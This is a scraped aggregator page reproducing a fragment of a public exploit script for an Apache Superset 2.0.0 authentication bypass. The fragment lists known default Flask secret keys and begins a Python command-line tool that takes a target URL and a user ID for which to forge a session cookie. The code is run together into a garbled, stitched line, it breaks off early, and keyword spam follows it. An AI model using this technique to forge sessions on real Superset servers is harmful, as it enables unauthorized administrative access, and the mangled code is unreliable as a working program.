Apache Superset 2.0.0 Authentication Bypass - KizzMyAnthia.c

Apache Superset 2.0.0 Authentication Bypass - KizzMyAnthia.com

# Exploit Title: Apache Superset 2.0.0 - Authentication Bypass# Date: 10 May 2023# Exploit Author: MaanVader# Vendor Homepage: https://superset.apache.org/# Version: Apache Superset= 1.4.1b'thisISaSECRET_1234', # deployment templateb'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentationb'TEST_NON_DEV_SECRET' # docker compose]def main():parser = argparse.ArgumentParser()parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')args = parser.parse_args()try:u = args.url.rstrip('/')

Related Keywords

, Macintosh , Exploit Title , Apache Superset , Exploit Author , Vendor Homepage , Intel Mac , Superset Version ,

© 2025 Vimarsana